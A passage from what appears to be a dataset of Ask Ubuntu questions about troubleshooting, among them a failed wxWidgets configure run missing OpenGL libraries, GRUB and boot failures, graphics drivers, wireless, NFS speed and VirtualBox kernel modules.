... yes checking for -- enable-prologio ... no checking for -- enable-resources ... no checking for -- enable-clipboard ... yes checking for -- enable-dnd ... yes checking for -- enable-metafile ... yes checking for -- enable-controls ... no checking for -- enable-accel ... yes checking for -- enable-animatectrl ... yes checking for -- enable-button ... yes checking for -- enable-bmpbutton ... yes checking for -- enable-bmpcombobox ... yes checking for -- enable-calendar ... yes checking for -- enable-caret ... yes checking for -- enable-checkbox ... yes checking for -- enable-checklst ... yes checking for -- enable-choice ... yes checking for -- enable-choicebook ... yes checking for -- enable-collpane ... yes checking for -- enable-colourpicker ... yes checking for -- enable-combobox ... yes checking for -- enable-comboctrl ... yes checking for -- enable-datepick ... yes checking for -- enable-dirpicker ... yes checking for -- enable-display ... yes checking for -- enable-detect_sm ... yes checking for -- enable-filepicker ... yes checking for -- enable-fontpicker ... yes checking for -- enable-gauge ... yes checking for -- enable-grid ... yes checking for -- enable-dataviewctrl ... no checking for -- enable-hyperlink ... yes checking for -- enable-imaglist ... yes checking for -- enable-listbook ... yes checking for -- enable-listbox ... yes checking for -- enable-listctrl ... yes checking for -- enable-notebook ... yes checking for -- enable-odcombobox ... yes checking for -- enable-radiobox ... yes checking for -- enable-radiobtn ... yes checking for -- enable-sash ... yes checking for -- enable-scrollbar ... yes checking for -- enable-searchctrl ... yes checking for -- enable-slider ... yes checking for -- enable-spinbtn ... yes checking for -- enable-spinctrl ... yes checking for -- enable-splitter ... yes checking for -- enable-statbmp ... yes checking for -- enable-statbox ... yes checking for -- enable-statline ... yes checking for -- enable-stattext ... yes checking for -- enable-statusbar ... yes checking for -- enable-tabdialog ... no checking for -- enable-textctrl ... yes checking for -- enable-togglebtn ... yes checking for -- enable-toolbar ... yes checking for -- enable-tbarnative ... yes checking for -- enable-treebook ... yes checking for -- enable-toolbook ... yes checking for -- enable-treectrl ... yes checking for -- enable-tipwindow ... yes checking for -- enable-popupwin ... yes checking for -- enable-commondlg ... yes checking for -- enable-aboutdlg ... yes checking for -- enable-choicedlg ... yes checking for -- enable-coldlg ... yes checking for -- enable-filedlg ... yes checking for -- enable-finddlg ... yes checking for -- enable-fontdlg ... yes checking for -- enable-dirdlg ... yes checking for -- enable-msgdlg ... yes checking for -- enable-numberdlg ... yes checking for -- enable-splash ... yes checking for -- enable-textdlg ... yes checking for -- enable-tipdlg ... yes checking for -- enable-progressdlg ... yes checking for -- enable-wizarddlg ... yes checking for -- enable-menus ... yes checking for -- enable-miniframe ... yes checking for -- enable-tooltips ... yes checking for -- enable-splines ... yes checking for -- enable-mousewheel ... yes checking for -- enable-validators ... yes checking for -- enable-busyinfo ... yes checking for -- enable-joystick ... yes checking for -- enable-metafile ... yes checking for -- enable-dragimage ... yes checking for -- enable-accessibility ... no checking for -- enable-palette ... yes checking for -- enable-image ... yes checking for -- enable-gif ... yes checking for -- enable-pcx ... yes checking for -- enable-tga ... yes checking for -- enable-iff ... no checking for -- enable-pnm ... yes checking for -- enable-xpm ... yes checking for -- enable-ico_cur ... yes checking for -- enable-official_build ... no saving argument cache configarg.cache checking for toolkit ... gtk checking for gcc ... gcc checking for c compiler default output file name ... a.out checking whether the c compiler works ... yes checking whether we are cross compiling ... no checking for suffix of executables ... checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept ansi c ... none needed checking whether we are using the intel c compiler ... no checking how to run the c preprocessor ... gcc -e checking for egrep ... grep -e checking whether gcc needs -traditional ... no checking for g++ ... g++ checking whether we are using the gnu c++ compiler ... yes checking whether g++ accepts -g ... yes checking whether we are using the intel c++ compiler ... no checking whether we are using the sun c++ compiler ... no checking for ranlib ... ranlib checking for ar ... ar checking for a bsd-compatible install ... /usr/bin/install -c checking for strip ... strip checking if make is gnu make ... yes checking whether ln -s works ... yes checking for strcasecmp ( ) in string.h ... yes checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking for stdlib.h ... ( cached ) yes checking for fnmatch.h ... yes checking for langinfo.h ... yes checking for malloc.h ... yes checking for unistd.h ... ( cached ) yes checking for wchar.h ... yes checking for sys/select.h ... yes checking for an ansi c-conforming const ... yes checking for inline ... inline checking for char ... yes checking size of char ... 1 checking for short ... yes checking size of short ... 2 checking for void * ... yes checking size of void * ... 8 checking for int ... yes checking size of int ... 4 checking for long ... yes checking size of long ... 8 checking for size_t ... yes checking size of size_t ... 8 checking for long long ... yes checking size of long long ... 8 checking for wchar_t ... yes checking size of wchar_t ... 4 checking for va_copy ... yes checking whether the compiler supports variadic macros ... yes checking for _file_offset_bits value needed for large files ... 64 checking if large file support is available ... yes checking for _largefile_source value needed for large files ... no checking for fseeko ... yes checking whether byte ordering is bigendian ... no checking for iostream ... yes checking if c++ compiler supports bool ... yes checking if c++ compiler supports the explicit keyword ... yes checking whether the compiler supports const_cast < > ... yes checking whether the compiler supports reinterpret_cast < > ... yes checking whether the compiler supports static_cast < > ... yes checking for std : :wstring in < string > ... yes checking for std : :istream ... yes checking for std : :ostream ... yes checking for libraries directory ... lib checking for glibc 2.1 or later ... yes checking for cos ... no checking for floor ... no checking if floating point functions link without -lm ... no checking for sin ... yes checking for ceil ... yes checking if floating point functions link with -lm ... yes checking for wcstoull ... yes configure : warning : defaulting to the the builtin regex library for unicode build . checking for zlib.h > = 1.1.4 ... yes checking for zlib.h ... ( cached ) yes checking for deflate in -lz ... yes checking for png.h > 0.90 ... yes checking for png.h ... ( cached ) yes checking for png_sig_cmp in -lpng ... yes checking for jpeglib.h ... yes checking for jpeg_read_header in -ljpeg ... yes checking for tiffio.h ... no configure : warning : system tiff library not found , will use built-in instead checking for expat.h ... yes checking if expat.h is valid c++ header ... yes checking for xml_parsercreate in -lexpat ... yes checking for mspack.h ... no checking for gtk+ version ... checking for pkg-config ... /usr/bin/pkg-config checking for gtk+ - version > = 2.0.0 ... yes ( version 2.24.17 ) checking whether gtk_icon_size_lookup is declared ... yes checking if gtk+ is version > = 2.6 ... yes checking for x11/xlib.h ... yes checking for x11/xkblib.h ... yes checking for xinerama ... no configure : warning : xinerama not found ; disabling wxdisplay checking for -lsm - x11 session management ... no configure : warning : libsm not found ; disabling session management detection checking for opengl headers ... found in /usr/include checking for gl/gl.h ... yes checking gl/glu.h usability ... yes checking gl/glu.h presence ... yes checking for gl/glu.h ... yes checking for -lgl ... no checking for -lmesagl ... no configure : error : opengl libraries not available i have looked at many posts suggesting they have the solution , but none of them work . what can i do to solve the opengl libraries not available problem ? ubuntu 13.04 amd64
405611	is it possible to swap between ubuntu and win8.1 if i install ubuntu on a external hdd	i am currently running windows 8.1 and i was wondering if i am able to install ubuntu to my external hdd ( it already has stuff on it but it still has a lot of space ) and swap between the 2 operating systems . if possible when i update ubuntu and windows 8.1 will the updates go to the hdd that the os was installed 2 . also if i can boot ubuntu from a external hdd how do i swap between windows 8.1 and ubuntu ?
405613	motd displayed twice	so here 's the deal . i 've created /etc/motd.tail as suggested by ubuntu documentation which should append static content to /etc/motd . however as well as this work , it displays the motd twice when i log on to the server via ssh . w00t ? ! is there any way to fix this ? this does seem like a bug to me . thanks
405618	trouble using the xonar essence stx soundcard	i 'm trying to get my asus xonar stx soundcard to work . it is recognized in the kernal if i type : aplay -l **** list of playback hardware devices **** card 0 : generic [ hd-audio generic ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : stx [ xonar stx ] , device 0 : multichannel [ multichannel ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : stx [ xonar stx ] , device 1 : digital [ digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 i have already tried to disable the onboard sound device , this just means that i have no sound at all . another note , i can see the device listed on the alsamixer . it does seem to control the hardware to some extent . it will click the soundcard when i change the analogue out . ( in alsamixer as well as the system settings - > sound gui ) i not sure what the next step should be . perhaps blacklisting the video card sound device . any pointers would be greatly appreciated .
405619	black screen after boot repair and grub lost after third reboot	after 10 installations trials and dozens of thread read i figured i would need some help . i just built a mining rig ( for litecoin ) with these : 1 asrock 970 extreme 4 4 gb ram 1 processor amd sempron 2,8 ghz 3 gigabyte radeon r9 290 1 blank 8gb usb stick 1 live usb for xubuntu 13.10 i wo n't got through all the trials and error before getting to the end of the installation without a bug , so here where i 'm stuck at : my motherboard ca n't allow install in legacy mode , so i successfully installed xubuntu 13.10 having partitioned the usb stick with 500mb swap 100mb of efi boot 7,4 gb for / so when i reboot , the boot hangs to a black screen ( no cursor ) just after the bios screen . so i as explained in multiple forums , i reboot on liveusb and launch boot-repair . it tells me that it detected a winefi , would i like to activate ? of course yes . and boot repair finishes . here is the boot info summary . from here i 'm almost convinced it should work . i reboot pressing f2 to enter uefi . i see in my boot order choices that i have a media called ubuntu . ( sounds good ) but after saving the changes and exiting i do n't see any grub ... i press enter just to see what happens and at the moment i press the button i see the grub flashing and disappearing right away . then pc hangs to black screen ( still no cursor ) . great ! i should get it to work with nomodeset or radeon.modeset=0 . so i try that at the second reboot ( this time the grub appeared immediately ) . and i wait with hope for the black screen to turn into the xubuntu splash screen ... no luck . so i reboot to try to launch ubuntu in recovery mode . but the system did n't let me , on this boot and the 3 to 5 i did after that , i could n't boot anymore . my grub was lost . my computer either hangs on the bios splash screen or wo n't recognized my `` ubuntu '' media anymore in the uefi boot option . it will now say uefi - verbatim 8gb ... so what am i supposed to do here ? i 'm open to any advices . i 'm starting to think , maybe my usb stick is broken ? ( i once got the problem with a liveusb , could n't pass the grub or no workaround worked ) or is something wrong with my install/boot-repair ?
405621	weird volume levels	i have a old hp pavilion dv6645eo with the hp quicklaunch buttons . when i use the volume buttons , the only sound in the upper echelons of the 'sound bar ' . i 've been looking long after why it happens . but by opening alsamixer in the terminal , i found out why . the volume scale covers both headphones and master on the same scale ! when headphones are at max , then it adjust volume on the master - that 's why there is only sound on the top steps . how do i get the voice buttons to only adjust the master ?
405623	wicd does not like to reconnect upon resuming in the same or different location	ubuntu 13.10 - samsung series 9 - wireless connection only issue : wicd does not automatically re-connect after the laptop is suspended . this happens when the laptop is turned back on in the same room , or when i get back home and open it up . i have the `` automatically connect to this network '' on all of my preferred networks in each location . additionally , when i resume in another location , the wireless network list does not refresh . i have network manager and all of its parts uninstalled . wicd is the only wireless connection software that i am running . i have looked all over ask ubuntu , but none of the solutions ( installing , purging , pillaging ) have not solved this .
405627	dark arts required to get nvidia driver working	okay , so i know there are a metric ton of `` why does n't my nvidia gfx work on ubuntu [ x.xx ] ? '' here already ; in the process of trying to get my own drivers to even install correctly , i 've read them all . basically , which dark art is required ; which secret combination of the foulest ingredients would allow me , a humble ubuntu 13.10 user , to install the new nvidia drivers ( 331.38 ) with the newest linux kernel ( 3.12 ) on my system . no matter how i do it ; through the xorg edgers ppa ( which mucks up unity to the point where it wo n't load ) , to installing it from the .run file ( similar result ) . nothing seems to work for me , ever . i use a laptop with a 740m and intel 4000 graphics , but dual chip thing is n't my problem ; it 's actually getting the driver for one of them to even install correctly . i do n't quite understand what i 'm doing wrong . thanks .
405628	touchscreen input does n't rotate : lenovo yoga 13 / yoga 2 pro	after receiving a lenovo yoga 13 for christmas , i have been pleased with its performance with ubuntu . it is easy to change the display orientation under the display settings menu or by typing , e.g . xrandr -o inverted in the terminal . however , such does not rotate the input of the touchscreen ( or—less importantly—the touchpad ) . i have looked around for solutions to this issue , and found two promising sources . ( 1 ) http : //cc.oulu.fi/~rantalai/synaptics/ . installing the package here and running the advised commands rotated the display and touchpad input ( but not that of the touchscreen ) . ( 2 ) http : //www.elfsternberg.com/2013/05/25/thinkpad-yoga-ubuntu-12/ . this website recommended updating an input package , which i have n't tried .
405630	slow wlan connect on ac power , very quick on battery / lubuntu	i found a very weird effect on my lenovo x220 . when i am on battery power and boot the wlan connect is like instantly ! when i am on ac power and boot , the wlan connect ( to the same home wifi ) does take up to 30 seconds ! ! also a manual disconnect and reconnect takes the same time . i have no idea how to change and explain that . i am too new to linux to know which config files and log files to check any hint is much appreciated . found no advice anywhere on the net .
405631	how to make tlp only start after login ?	tlp helped me get good battery life on my laptop , but i still have a long boot time in ubuntu . i wonder if i can allow the boot to run under the ondemand cpu governor but change the cpu governor to powersave mode only after the desktop has been drawn ? any idea how to achieve that ?
405633	virtualbox 4.3 on ubuntu 13.10 unable to run vm	like ubuntu 13.10 virtualbox error kernel driver not installed ( rc=-1908 ) i am also having a problem i keep getting the following error : trying to register the virtualbox kernel modules using dkmserror ! your kernel headers for kernel 3.8.0-25-generic can not be found . please install the linux-headers-3.8.0-25-generic package , or use the -- kernelsourcedir option to tell dkms where it 's located ... failed ! ( failed , trying without dkms ) recompiling virtualbox kernel modules ... failed ! ( look at /var/log/vbox-install.log to find out what went wrong ) processing triggers for ureadahead ... i am unable to start a virtual machine i installed from repository . any ideas ? edit : when i start a vm i get : kernel driver not installed ( rc=-1908 ) the virtualbox linux kernel driver ( vboxdrv ) is either not loaded or there is a permission problem with /dev/vboxdrv . please reinstall the kernel module by executing '/etc/init.d/vboxdrv setup' as root . if it is available in your distribution , you should install the dkms package first . this package keeps track of linux kernel changes and recompiles the vboxdrv kernel module if necessary . edit the same errors with virtualbox4.2 edit sudo apt-get install linux-headers-3.8.0-25-generic reading package lists ... done building dependency tree reading state information ... done package linux-headers-3.8.0-25-generic is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'linux-headers-3.8.0-25-generic ' has no installation candidate edit update manually updated the kernel from 3.8.0.25 to 3.10.0-031000-generic and now it all works !
405638	what are the disadvantages of having a dot in a user name ?	a student just asked what could be the downside of having a dot ( . ) in the name of the user . for example : john.doe how will this affect the system or any apps for that matter ?
405640	how to stop the glitchy graphics ?	let me start off by saying i 'm new to linux in general , i apologize if this is something simple . anyways , all the applications glitch out oddly . for example , my icons to the left on the bar flash quite often . sometimes the icons picture is just blank . another example is that most of the time the applications windows will have weird lines popping out of them , and then the rest of the screen is shaded really weird . memory : 7.2gib processor : amd a6-4400m apu with radeon ( tm ) hd graphics x 2 graphics : gallium 0.4 on amd aruba os type : 64-bit disk : 484.2 gb i 've already tried updating the drivers through system settings ... and i got nowhere with it . if anyone has any ideas that would be great ! ( once again sorry if i did n't do a lot of this right ) thanks ! img link - http : //imgur.com/ahxzzdq
405644	slow wireless with rt2800pci	my wireless connection is extremely slow . i am using ubuntu 13.10 , but has been persistent with previous releases as well . http : //paste.ubuntu.com/6741980/ http : //paste.ubuntu.com/6753596/
405645	how to enable monitor from terminal ?	i accidentally disabled my monitors , so when i log in i land on a blank , back-lit screen . i can open terminals with ctrl+alt+f # , so how do i enable the monitor from terminal ? i tried xrandr , but it ca n't open display . xset does not work either . i found this question which closely resembles my problem . the answer provides a script to be put in /etc/x11/xreset.d . running it does not solve my problem ( though it is likely i do n't understand how to use it properly ) . i think i somehow made the new default to be `` disable monitors '' . running ubuntu studio 13.10 . i do not have nvidia drivers . i ca n't find an xorg.conf file to remove . thankful for any and all input ! edit : output of command xrandr -d :0 screen 0 : minimum 320x200 , current 1366 x 768 , maximum 32767 x 32767 lvds1 connected 1366x768+-32768+-32768 ( normal left inverted right x axis y axis ) 344mm x 192mm 1366x768 60.0* 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) still being a cli beginner i fail to understand from man xrandr how to switch on ( there is an off option ) or enable displays . output of xrandr -- auto is ca n't open display edit 2 : output of xrandr -d :0 -- auto configure crtc 0 failed maybe i just have to reinstall x11 ? edit 3 : outputs of suggested commands / which xset commands i tried : xrandr -d :0 output lvds1 -- auto configure crtc 0 failed xset q and xset dpms force on both return unable to open display ' '' ' no difference for sudo commands . edit 4 : more futile attempts and the potential discovery of a security issue 4.1 i 've tried to reinstall xorg and x11 , then i ran sudo apt-get install -- reinstall xserver* which failed with this output : ( many versions of this : ) note , selecting 'xserver-xorg-something ' for regex 'xserver*' ( next : ) some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : xserver-xorg-input-mtrack : conflicts : xserver-xorg-input-multitouch but 1.0~rc2+git20110312-2build4 is to be installed e : unable to correct problems , you have held broken packages . 4.2 next i logged in as guest and logged in as myself through tty ctrl+alt+f # and ran the same xrand commands as above ( op and edits 1-3 ) , with the same output as far as i can see . 4.3 then i created a new_user with full admin rights and repeated 4.2 via tty . 4.4 security issue ? no , just a need of awareness . not related to this subject , details at launchpad it begins looking like a system reinstall is necessary : - (
405647	dual booting and patitioning	so what i would like to do is boot windows 7 along side of 13.10 , now i have the windows iso ready and waiting , is there any way to do this without having to get rid of linux and having to re install windows and create a partition in windows then re install linux again ? ( i have lots of files and i donât have an external hard drive and i dont want to risk any on line file system ) any and all advice is appreciated : )
405653	decrease in network speeds on 12.04	i have a newish 12.04 box that i converted from freenas due to the difficulty with the freenas operating system and slow transfer speeds over gigabit ethernet . i got 12.04 setup without many difficulties and have been using the software raid 5 for an array of 4 1 tb disks . average read rate on the array is 298 mbps . setup nfs to connect between the linux server and my mac and was initially getting transfer speeds between 80 mbps and 110 mbps . something has changed and now i am getting peak transfer speeds of 25 mbps with an average of around 17.5 mbps . i 've checked with a windows 8.1 machine and with a mac , with both samba and nfs , and the transfer speeds are almost exactly the same across the board . ran several tests with iperf , all of which have shown consistent speeds of 950 mbps so it would seem to be a software issue as opposed to a limit imposed by the hardware . i have downloaded bonnie++ but i honestly have no idea where to begin with getting that to output something that is intelligible to me . all of my hardware is the same as when i was getting better performance so i am assuming it is something on the software side of linux . in linux , /etc/exports is setup for the nfs server as : /fileserver * ( rw , async , no_subtree_check ) on the mac it is set to automount to /network/filserver with the following settings : -fstype=nfs , soft , intr , noatime , timeo=900 , retrans=3 , proto=tcp 10.0.1.21 : /fileserver i had rsize and wsize set to 8192 but took it out as i figured it might do a better job negotiating those settings automatically . here 's the information returned on the network card : sudo lshw -class network *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 06 serial : d4:3d:7e : d8:0f:47 size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8168e-3_0.0.4 03/27/12 ip=10.0.1.21 latency=0 link=yes multicast=yes port=mii speed=1gbit/s resources : irq:40 ioport : d000 ( size=256 ) memory : f0004000-f0004fff memory : f0000000-f0003fff router is a wndr3700 , all cat 5e cabling with a gigabit swtich . i have tried different ports on the switch and the router and all comes back the same . any help would be appreciated . i have intermediate linux and networking skills but i am by no means an expert on either one . thanks !
405655	how to know why my server crashes ?	i have a dedicated server , and it crashes every sunday afternoon . wich tools can help me to analys the reason for these crashes ( apache ? rtorrent ? ) in my /var/logs dir , i have this log list : -rw-r -- r -- 1 root root 0 janv . 1 06:25 alternatives.log -rw-r -- r -- 1 root root 1655 déc . 26 21:16 alternatives.log.1 -rw-r -- r -- 1 root root 306 nov. 30 21:31 alternatives.log.2.gz -rw-r -- r -- 1 root root 2387 oct. 26 17:55 alternatives.log.3.gz drwxr-x -- - 2 root adm 4096 janv . 12 06:25 apache2 drwxr-xr-x 2 root root 4096 janv . 1 06:25 apt -rw-r -- r -- 1 root root 0 janv . 1 06:25 aptitude -rw-r -- r -- 1 root root 356 déc . 4 10:37 aptitude.1.gz -rw-r -- r -- 1 root root 301 nov. 30 19:17 aptitude.2.gz -rw-r -- r -- 1 root root 1653 oct. 26 17:44 aptitude.3.gz -rw-r -- -- - 1 root adm 1095699 janv . 15 09:17 auth.log -rw-r -- -- - 1 root adm 4765057 janv . 12 06:25 auth.log.1 -rw-r -- -- - 1 root adm 358694 janv . 5 06:25 auth.log.2.gz -rw-r -- -- - 1 root adm 1031748 déc . 29 06:25 auth.log.3.gz -rw-r -- -- - 1 root adm 334762 déc . 22 06:25 auth.log.4.gz -rw-rw -- -- 1 root utmp 0 janv . 1 06:25 btmp -rw-rw -- -- 1 root utmp 0 déc . 1 06:25 btmp.1 -rw-r -- -- - 1 root adm 5164 janv . 15 06:30 daemon.log -rw-r -- -- - 1 root adm 6951 janv . 11 09:32 daemon.log.1 -rw-r -- -- - 1 root adm 710 janv . 5 02:45 daemon.log.2.gz -rw-r -- -- - 1 root adm 5123 déc . 29 00:46 daemon.log.3.gz -rw-r -- -- - 1 root adm 5231 déc . 21 16:16 daemon.log.4.gz drwxr-xr-x 2 root root 4096 déc . 5 21:57 dbconfig-common -rw-r -- -- - 1 root adm 18132 janv . 15 08:51 debug -rw-r -- -- - 1 root adm 21490 janv . 10 11:09 debug.1 -rw-r -- -- - 1 root adm 21954 janv . 5 06:22 debug.2.gz -rw-r -- -- - 1 root adm 15179 déc . 28 23:36 debug.3.gz -rw-r -- -- - 1 root adm 4465 déc . 22 05:04 debug.4.gz -rw-r -- -- - 1 root adm 46433 déc . 27 14:50 dmesg -rw-r -- -- - 1 root adm 46433 déc . 27 14:36 dmesg.0 -rw-r -- -- - 1 root adm 12608 déc . 22 17:45 dmesg.1.gz -rw-r -- -- - 1 root adm 12602 déc . 15 20:31 dmesg.2.gz -rw-r -- -- - 1 root adm 12405 déc . 10 21:46 dmesg.3.gz -rw-r -- -- - 1 root adm 12400 déc . 7 14:58 dmesg.4.gz -rw-r -- r -- 1 root root 4559 janv . 15 09:14 dpkg.log -rw-r -- r -- 1 root root 135602 déc . 26 21:16 dpkg.log.1 -rw-r -- r -- 1 root root 2768 nov. 30 21:31 dpkg.log.2.gz -rw-r -- r -- 1 root root 27084 oct. 26 18:15 dpkg.log.3.gz drwxr-s -- - 2 debian-exim adm 4096 janv . 15 06:25 exim4 -rw-r -- r -- 1 root root 32160 déc . 5 21:50 faillog -rw-r -- r -- 1 root root 1115 déc . 18 16:45 fontconfig.log drwxr-xr-x 2 root root 4096 oct. 26 17:36 fsck drwxr-s -- - 2 gitlog adm 4096 déc . 22 17:45 git-daemon drwxr-xr-x 3 root root 4096 oct. 26 17:39 installer -rw-r -- -- - 1 root adm 18132 janv . 15 08:51 kern.log -rw-r -- -- - 1 root adm 21490 janv . 10 11:09 kern.log.1 -rw-r -- -- - 1 root adm 21954 janv . 5 06:22 kern.log.2.gz -rw-r -- -- - 1 root adm 45536 déc . 28 23:36 kern.log.3.gz -rw-r -- -- - 1 root adm 14091 déc . 22 05:04 kern.log.4.gz -rw-rw-r -- 1 root utmp 293460 janv . 15 09:13 lastlog -rw-r -- -- - 1 root adm 0 oct. 26 17:42 lpr.log -rw-r -- -- - 1 root adm 0 oct. 26 17:42 mail.err -rw-r -- -- - 1 root adm 0 oct. 26 17:42 mail.info -rw-r -- -- - 1 root adm 0 oct. 26 17:42 mail.log -rw-r -- -- - 1 root adm 0 oct. 26 17:42 mail.warn -rw-r -- -- - 1 root adm 588 janv . 15 06:25 messages -rw-r -- -- - 1 root adm 1176 janv . 12 06:25 messages.1 -rw-r -- -- - 1 root adm 190 janv . 5 06:25 messages.2.gz -rw-r -- -- - 1 root adm 29627 déc . 29 06:25 messages.3.gz -rw-r -- -- - 1 root adm 10174 déc . 22 06:25 messages.4.gz drwxr-s -- - 2 mysql adm 4096 déc . 5 21:50 mysql -rw-r -- -- - 1 mysql adm 0 déc . 18 16:47 mysql.err -rw-r -- -- - 1 mysql adm 0 janv . 15 06:25 mysql.log -rw-r -- -- - 1 mysql adm 20 janv . 14 06:25 mysql.log.1.gz -rw-r -- -- - 1 mysql adm 20 janv . 13 06:25 mysql.log.2.gz -rw-r -- -- - 1 mysql adm 20 janv . 12 06:25 mysql.log.3.gz -rw-r -- -- - 1 mysql adm 20 janv . 11 06:25 mysql.log.4.gz -rw-r -- -- - 1 mysql adm 20 janv . 10 06:25 mysql.log.5.gz -rw-r -- -- - 1 mysql adm 20 janv . 9 06:25 mysql.log.6.gz -rw-r -- -- - 1 mysql adm 20 janv . 8 06:25 mysql.log.7.gz drwxr-xr-x 2 root root 4096 oct. 26 17:42 news drwxr-xr-x 2 ntp ntp 4096 mai 12 2012 ntpstats drwxr-xr-x 2 root root 4096 janv . 15 06:25 pgl -rw -- -- -- - 1 root root 56 janv . 12 06:25 php5-fpm.log -rw -- -- -- - 1 root root 56 janv . 5 06:25 php5-fpm.log.1 -rw -- -- -- - 1 root root 76 nov. 3 06:25 php5-fpm.log.10.gz -rw -- -- -- - 1 root root 234 oct. 26 18:43 php5-fpm.log.11.gz -rw -- -- -- - 1 root root 76 déc . 29 06:25 php5-fpm.log.2.gz -rw -- -- -- - 1 root root 264 déc . 27 14:50 php5-fpm.log.3.gz -rw -- -- -- - 1 root root 403 déc . 18 17:13 php5-fpm.log.4.gz -rw -- -- -- - 1 root root 213 déc . 10 21:46 php5-fpm.log.5.gz -rw -- -- -- - 1 root root 540 déc . 7 14:58 php5-fpm.log.6.gz -rw -- -- -- - 1 root root 245 nov. 30 22:27 php5-fpm.log.7.gz -rw -- -- -- - 1 root root 76 nov. 17 06:25 php5-fpm.log.8.gz -rw -- -- -- - 1 root root 213 nov. 16 16:26 php5-fpm.log.9.gz drwxr-x -- - 3 root adm 20480 janv . 15 08:32 samba -rw-r -- -- - 1 root adm 2898 janv . 15 09:17 syslog -rw-r -- -- - 1 root adm 32172 janv . 15 06:25 syslog.1 -rw-r -- -- - 1 root adm 2134 janv . 14 06:25 syslog.2.gz -rw-r -- -- - 1 root adm 1318 janv . 13 06:25 syslog.3.gz -rw-r -- -- - 1 root adm 1163 janv . 12 06:25 syslog.4.gz -rw-r -- -- - 1 root adm 1310 janv . 11 06:25 syslog.5.gz -rw-r -- -- - 1 root adm 1341 janv . 10 06:25 syslog.6.gz -rw-r -- -- - 1 root adm 3687 janv . 9 06:25 syslog.7.gz -rw-r -- -- - 1 root adm 0 déc . 28 06:25 user.log -rw-r -- -- - 1 root adm 147 déc . 27 14:47 user.log.1 -rw-r -- -- - 1 root adm 87 déc . 10 21:42 user.log.2.gz -rw-r -- -- - 1 root adm 183 déc . 7 14:54 user.log.3.gz -rw-r -- -- - 1 root adm 108 nov. 30 22:24 user.log.4.gz -rw-r -- -- - 1 root adm 0 janv . 12 06:25 vsftpd.log -rw-r -- -- - 1 root adm 429 janv . 10 20:54 vsftpd.log.1 -rw-r -- -- - 1 root adm 2929 janv . 4 17:12 vsftpd.log.2 -rw-r -- -- - 1 root adm 458314 déc . 28 13:01 vsftpd.log.3 -rw-r -- -- - 1 root adm 4986 déc . 21 14:33 vsftpd.log.4 -rw-rw-r -- 1 root utmp 384 janv . 15 09:13 wtmp -rw-rw-r -- 1 root utmp 216576 déc . 27 14:51 wtmp.1 i expect sunday to see what happens exactly in apache2 log ( because i have too many log ) but i do n't have rtorrent log , it 's a shame because i think rtorrent is the cause of crashes
405656	firefox does n't start in ubuntu 13.10	clicking on the firefox icon in the unity launcher bar does n't work . icon start blinking and after few seconds it simply stop blinking and nothing else happens and firefox does n't start . os release is ubuntu 13.10 ( 3.11.0-15-generic # 23-ubuntu smp mon dec 9 18:17:04 utc 2013 ) . currently installed version of firefox is 26.0 trying from a terminal gives the following error messages : ( process:5576 ) : glib-critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed ( firefox:5576 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :sm-connect after class was initialised ( firefox:5576 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :show-crash-dialog after class was initialised ... and finally permission refused on /home/myaccount/.gnome2/accels when it attempted to create gnome keyboard shortcuts folder . thanks in advance for your help
405658	x wo n't start ( black screen after splash )	when i boot my computer , the purple ubuntu splash appears ( without the orange dots ) for a split second , and then the screen turns black . i was able to get the xorg.0.log from the command line . i think this happened after installing the proprietary drivers for my radeon hd 6770 . xorg.0.log file ( sorry , file is too big ) any idea what 's going on ?
405659	how can i get multiple workspaces in kubuntu 13.10 ?	i find kde for kubuntu 13.10 is annoying .
405660	ubuntu install on chromebook arm ( samsung )	alright so i installed the crouton ubuntu thing on my chromebook while following this tutorial . after getting it installed it would not let me set a password and now i ca n't update the system so i 'm wondering how to fix it . i 'm kind of noobish at this . this is what is displayed- ( precise ) redeyeschivo @ localhost- $ sudo password set [ sudo ] password for redeyeschivo :
405662	admin password not accepted on 13.04	i am not able to use my admin account password even though i am sure i am using the right one .
405663	configuring logrotate without root access ( per user log rotation )	how best can logrotate be configured , on a per-user basis , to rotate files in the home directory of the user , under control of a per-user 'crontab -e ' ?
405666	xrdp not showing taskbar or header , what 's wrong ?	i recently started out with ubuntu and i installed x-remote desktop connection . however , when i log into the session , i get the desktop background and a mouse , no task bar , no screen header . the instructions i followed were on this website : http : //www.ubuntututorials.com/remote-desktop-ubuntu-12-04-windows-7/ am i doing something wrong ?
405667	what 's this mean ? double-click on archive and extract into /tmp	how do iextract into /tmp ? what /tmp ? whatdoes thatmean ? iknow it is a folder , but whathappens nextwheninstalling a january copy of seamonkey . why ca n't ijust search for it in my ubuntu software center . it extracts to/tmp . thenthe terminal given this : sudo su -c `` mv /tmp/seamonkey* /opt '' tries to do something but says it `` mv : can not stat ‘/tmp/seamonkey*’ : no such file or directory '' what do i do to use seamonkey ?
